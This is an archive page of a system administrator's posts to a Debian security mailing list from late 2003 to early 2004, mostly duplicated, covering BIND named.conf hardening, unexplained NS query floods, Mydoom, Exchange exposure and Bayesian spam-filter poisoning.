> own to get into place. But you will see queries being denied and if you 

Yes, I've got allow-transfer groups on all domains; allow-query { any; }
on all domains I server, and an options allow-query group and allow-recursion
group in options so that only authorized sites can use the cache.

> check those IP's you'll see that they don't run any nameserver. So 
> don't worry to much.

I'd originally thought otherwise, but as I went through
the trace I found the real name servers were trying to
do a lookup for a dead zone, one I used to host but which
the owner has taken off line. Some fairly big ISP's are
using annoying short Retry times...

> I did but wasn't impressed, only when the new cyberangels was making 
> sure we needed to handle an extra 6 a 700 q/s ;-)

I have to be careful though as I get phone calls if
my bandwidth usage goes too high. It got so bad a week
ago (before I put in the blocking) that processes 
were dying on my server due to memory starvation (the kernel
was killing processes as resources were being overused), 
that I had to risk down time to do something about it. 
 
I'd still be interested to know if anyone knows *why*
so many people are doing this. I know what they are doing;
I can block it; but I'm curious. I've got a gut feeling
it has something to do with spammers hiding their tracks,
but I'm not sure how it would or why it would be useful
to them. 

I just can't come up with anything else.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Query NS

2004-02-01 Thread Dale Amon
On Sun, Feb 01, 2004 at 03:46:07PM +0100, Hans Spaans wrote:
> You added it globally and to every zone? Also allow-transfer is a nice 
> own to get into place. But you will see queries being denied and if you 

Yes, I've got allow-transfer groups on all domains; allow-query { any; }
on all domains I server, and an options allow-query group and allow-recursion
group in options so that only authorized sites can use the cache.

> check those IP's you'll see that they don't run any nameserver. So 
> don't worry to much.

I'd originally thought otherwise, but as I went through
the trace I found the real name servers were trying to
do a lookup for a dead zone, one I used to host but which
the owner has taken off line. Some fairly big ISP's are
using annoying short Retry times...

> I did but wasn't impressed, only when the new cyberangels was making 
> sure we needed to handle an extra 6 a 700 q/s ;-)

I have to be careful though as I get phone calls if
my bandwidth usage goes too high. It got so bad a week
ago (before I put in the blocking) that processes 
were dying on my server due to memory starvation (the kernel
was killing processes as resources were being overused), 
that I had to risk down time to do something about it. 
 
I'd still be interested to know if anyone knows *why*
so many people are doing this. I know what they are doing;
I can block it; but I'm curious. I've got a gut feeling
it has something to do with spammers hiding their tracks,
but I'm not sure how it would or why it would be useful
to them. 

I just can't come up with anything else.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Query NS

2004-02-01 Thread Dale Amon
On Sun, Feb 01, 2004 at 02:29:53PM +0100, Hans Spaans wrote:
> But than a gain, you can do a joke next month so people have a problem 
> or you can fix this problem by adding allow-query statements to your 
> named.conf and forcing people to abuse someone else.

Actually that's precisely how I discovered it. I added
allow queries and was trying to figure out why I was
denying so many queries per second.

Others should take a look and see if this is really
widespread. I'm getting it from a whole *bunch* of
different ip's. 

I wish I could do the joke, but I have too many real
zones that I primary and secondary so I can't really
load a phony root.db.

I agree with your analysis. It seems like a really
stupid thing to do, which is why I am having trouble
understanding why so many people are querying me
like that. It just doesn't make sense.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Query NS

2004-02-01 Thread Dale Amon
What is the purpose of a DNS query NS ? It returns
to the requester my list of root servers, which seems
pointless... and I am getting hit by them at the rate
of several a second from various nameservers.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Query NS

2004-02-01 Thread Dale Amon
On Sun, Feb 01, 2004 at 02:29:53PM +0100, Hans Spaans wrote:
> But than a gain, you can do a joke next month so people have a problem 
> or you can fix this problem by adding allow-query statements to your 
> named.conf and forcing people to abuse someone else.

Actually that's precisely how I discovered it. I added
allow queries and was trying to figure out why I was
denying so many queries per second.

Others should take a look and see if this is really
widespread. I'm getting it from a whole *bunch* of
different ip's. 

I wish I could do the joke, but I have too many real
zones that I primary and secondary so I can't really
load a phony root.db.

I agree with your analysis. It seems like a really
stupid thing to do, which is why I am having trouble
understanding why so many people are querying me
like that. It just doesn't make sense.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Query NS

2004-02-01 Thread Dale Amon
What is the purpose of a DNS query NS ? It returns
to the requester my list of root servers, which seems
pointless... and I am getting hit by them at the rate
of several a second from various nameservers.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Hardening named.conf

2004-01-28 Thread Dale Amon
Things don't seem to be working quite as expected. I have
something like this now:

 acl mydomain {
localhost;
192.168.0.0/24;
10.1.1.0/24;
 };
 
There are many etho:n and I tried it with each ip
specified individually, then added the localhost key
word in addtion.

 options {
allow-recursion {
mydomain;
};
 };
 
This seems to do much of what I want... but I am 
seeing some things which are a bit dodgy. For instance,
if I run iptstate on the dns server and tell it to resolve
names, I get all the inverse lookups denied.

I now suspect at least some of the 1 or so queries
I've blocked in the last couple hours are valid, but it
is hard to tell amidst the buzzing of the spammers on
the screen door...

I note that another person suggested this is the wrong
technique to use. Would that person say it was better
to do something like:


 options {
   allow-queries {
mydomain;
 };

  zone 
allow-queries {
all;
};

???

I have to be careful with experimentation because this
is not a toy machine. Not exceedingly busy, but still
a real server doing real serving.

A slightly different problem, which I just started 
looking into deeper, is that I have
zone .
allow-transfer {
dnsip1;
dnsip2;
myworkstation;
};

where the object is to allow my workstation to 
do host -a -l ... but it doesn't work. Says I
am not a primary or secondary. This is not quite
what I would expect since anyone can transfer if
there is no allow-transfer statement at all.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Hardening named.conf

2004-01-28 Thread Dale Amon
Things don't seem to be working quite as expected. I have
something like this now:

 acl mydomain {
localhost;
192.168.0.0/24;
10.1.1.0/24;
 };
 
There are many etho:n and I tried it with each ip
specified individually, then added the localhost key
word in addtion.

 options {
allow-recursion {
mydomain;
};
 };
 
This seems to do much of what I want... but I am 
seeing some things which are a bit dodgy. For instance,
if I run iptstate on the dns server and tell it to resolve
names, I get all the inverse lookups denied.

I now suspect at least some of the 1 or so queries
I've blocked in the last couple hours are valid, but it
is hard to tell amidst the buzzing of the spammers on
the screen door...

I note that another person suggested this is the wrong
technique to use. Would that person say it was better
to do something like:


 options {
   allow-queries {
mydomain;
 };

  zone 
allow-queries {
all;
};

???

I have to be careful with experimentation because this
is not a toy machine. Not exceedingly busy, but still
a real server doing real serving.

A slightly different problem, which I just started 
looking into deeper, is that I have
zone .
allow-transfer {
dnsip1;
dnsip2;
myworkstation;
};

where the object is to allow my workstation to 
do host -a -l ... but it doesn't work. Says I
am not a primary or secondary. This is not quite
what I would expect since anyone can transfer if
there is no allow-transfer statement at all.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Hardening named.conf

2004-01-28 Thread Dale Amon
I've finally been annoyed enough by spammer hits on
my DNS that I've pulled out the BOG for the first time
in several years.

What I'd like to accomplish is the following:

* allow-query for a specific list of addresses
  to use the server for their dns resolution.

* allow-query to the universe for zones
  (domains and subdomains) that are hosted 
  as primary or secondary on the server but 
  drop all other requests.

* I already limit zone xfr's to specific
  machines.

I'm not clear on how to do the first and second without
them interfering with each other although I'm sure
it can be done.

I am leaning towards an options allow-query with a
an access list and adding allow-query to each zone
to allow-query all if I can figure out how to do that.

If some kind soul knows off the top of their head, it
would save me the better part of an evening and perhaps
wee hours of the morning.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Hardening named.conf

2004-01-28 Thread Dale Amon
I've finally been annoyed enough by spammer hits on
my DNS that I've pulled out the BOG for the first time
in several years.

What I'd like to accomplish is the following:

* allow-query for a specific list of addresses
  to use the server for their dns resolution.

* allow-query to the universe for zones
  (domains and subdomains) that are hosted 
  as primary or secondary on the server but 
  drop all other requests.

* I already limit zone xfr's to specific
  machines.

I'm not clear on how to do the first and second without
them interfering with each other although I'm sure
it can be done.

I am leaning towards an options allow-query with a
an access list and adding allow-query to each zone
to allow-query all if I can figure out how to do that.

If some kind soul knows off the top of their head, it
would save me the better part of an evening and perhaps
wee hours of the morning.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: W32/Mydoom@MM (was: Re: )

2004-01-27 Thread Dale Amon
On Tue, Jan 27, 2004 at 09:50:24AM -0700, s. keeling wrote:
> Pardon me if this seems a bit thick headed, but why should I care?  The
> Windows world is always being attacked by crap like this.  Why is this
> news?
> 
> I don't use Windows.  Since you're using Evolution, I assume you
> aren't either.  So what's the big deal?
> 
> Of course if you're using Debian as a mailserver for an internal
> Windows network, this may affect you, but what's it got to do with
> Debian?

Many use Debian boxes as corporate servers. Some people
here will have to worry about security of their company
LAN which contains Windows boxes picking up their mail
from that Linux server.

So yes, for some people it *does* matter.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: W32/Mydoom@MM (was: Re: )

2004-01-27 Thread Dale Amon
On Tue, Jan 27, 2004 at 09:50:24AM -0700, s. keeling wrote:
> Pardon me if this seems a bit thick headed, but why should I care?  The
> Windows world is always being attacked by crap like this.  Why is this
> news?
> 
> I don't use Windows.  Since you're using Evolution, I assume you
> aren't either.  So what's the big deal?
> 
> Of course if you're using Debian as a mailserver for an internal
> Windows network, this may affect you, but what's it got to do with
> Debian?

Many use Debian boxes as corporate servers. Some people
here will have to worry about security of their company
LAN which contains Windows boxes picking up their mail
from that Linux server.

So yes, for some people it *does* matter.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Need recomendations for https proxy that serves as a firewall proxy

2003-12-31 Thread Dale Amon
On Wed, Dec 31, 2003 at 03:05:43PM +0100, Richard Atterer wrote:
> On Wed, Dec 31, 2003 at 11:33:02AM +0200, Haim Ashkenazi wrote:
> > I have a client that have an exchange server inside the LAN and he wants to
> > access the web interface from the world. I thought I'll put a transparent
> > proxy server on the DMZ. apt-cache search proxy gave a few options but
> > except squid (which is a little overkill for this) I don't know any of them
> > (especially in terms of security) and I'm looking for recommendations.
> 
> Um, do I understand correctly that you want to allow access from the
> internet to a machine in your client's LAN? In that case, squid is indeed
> the wrong solution.

I think they may be talking about MS Exchange Server.
The program I like to think of as "The Internet's
Answer to the Petrie Dish*"

I do not think I would use the words "Exchange Server"
and "Security" in the same breath. 

On the serious side, you probably could allow a port
redirect to that machine if there are no other web
services to be accessed.

In general though, this is a pretty bad idea, and with
MS Inside, even worse.

* for the non biologically inclined, that's what you
  use for culturing bacteria...

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Need recomendations for https proxy that serves as a firewall proxy

2003-12-31 Thread Dale Amon
On Wed, Dec 31, 2003 at 03:05:43PM +0100, Richard Atterer wrote:
> On Wed, Dec 31, 2003 at 11:33:02AM +0200, Haim Ashkenazi wrote:
> > I have a client that have an exchange server inside the LAN and he wants to
> > access the web interface from the world. I thought I'll put a transparent
> > proxy server on the DMZ. apt-cache search proxy gave a few options but
> > except squid (which is a little overkill for this) I don't know any of them
> > (especially in terms of security) and I'm looking for recommendations.
> 
> Um, do I understand correctly that you want to allow access from the
> internet to a machine in your client's LAN? In that case, squid is indeed
> the wrong solution.

I think they may be talking about MS Exchange Server.
The program I like to think of as "The Internet's
Answer to the Petrie Dish*"

I do not think I would use the words "Exchange Server"
and "Security" in the same breath. 

On the serious side, you probably could allow a port
redirect to that machine if there are no other web
services to be accessed.

In general though, this is a pretty bad idea, and with
MS Inside, even worse.

* for the non biologically inclined, that's what you
  use for culturing bacteria...

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: suspicious smbd connections

2003-12-24 Thread Dale Amon
On Wed, Dec 24, 2003 at 03:33:54PM +0100, outsider wrote:
> But I have a dynamic IP. Every time I boot my system I get another 
> IP-address.

Besides what everyone else said... I've also seen it
happen that someone pulls an address from dhcp that
was perhaps minutes before being used by someone running
a p2p server. Not relevant to your samba, but it can be
so bad you reboot to get off the ip.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: suspicious smbd connections

2003-12-24 Thread Dale Amon
On Wed, Dec 24, 2003 at 03:33:54PM +0100, outsider wrote:
> But I have a dynamic IP. Every time I boot my system I get another 
> IP-address.

Besides what everyone else said... I've also seen it
happen that someone pulls an address from dhcp that
was perhaps minutes before being used by someone running
a p2p server. Not relevant to your samba, but it can be
so bad you reboot to get off the ip.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Attempts to poison bayesian systems

2003-12-24 Thread Dale Amon
On Wed, Dec 24, 2003 at 04:08:14AM +, Nick Boyce wrote:
> Merry Happy Season Of Jollyness everyone
> Nick Boyce
> Bristol, UK

I'll second that: A Merry Christmas and a bug-free New
Year to all!

Dale Amon
Belfast, UK and/or Ireland ;-^

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Attempts to poison bayesian systems

2003-12-24 Thread Dale Amon
On Wed, Dec 24, 2003 at 04:08:14AM +, Nick Boyce wrote:
> Merry Happy Season Of Jollyness everyone
> Nick Boyce
> Bristol, UK

I'll second that: A Merry Christmas and a bug-free New
Year to all!

Dale Amon
Belfast, UK and/or Ireland ;-^

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Attempts to poison bayesian systems

2003-12-23 Thread Dale Amon
On Tue, Dec 23, 2003 at 01:32:23PM +, Kalle Kivimaa wrote:
> I have yet to see a false positive caused by this even though I get
> quite a lot of this stuff and routinely mark it as spam.

I can't think of any other reason for someone to do it
though. There has to be a point. Someone is going to a 
lot of trouble.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Attempts to poison bayesian systems

2003-12-23 Thread Dale Amon
I've been noticing loads of mails like this lately:

  Date: Sun, 21 Dec 2003 16:25:34 +0500
  From: "Joseph Jenkins" <[EMAIL PROTECTED]>
  Subject: Re: MIT, rest in peace!
  To: [EMAIL PROTECTED]
  X-Mailer: mPOP Web-Mail 2.19

  emery atrocious larval drippy elate incontrollable raster anglicanism
  checkerberry feed sit ajar saturable decathlon
  already climate inhibition pagoda narcissus expository toni

I can only assume someone out there is trying to attack
bayesian systems by loading them up with all sorts of
normal words so that good mail gets false positives, thus
breaking the systems.

I presume others are seeing this?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Attempts to poison bayesian systems

2003-12-23 Thread Dale Amon
On Tue, Dec 23, 2003 at 01:32:23PM +, Kalle Kivimaa wrote:
> I have yet to see a false positive caused by this even though I get
> quite a lot of this stuff and routinely mark it as spam.

I can't think of any other reason for someone to do it
though. There has to be a point. Someone is going to a 
lot of trouble.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



  1   2   3   4   >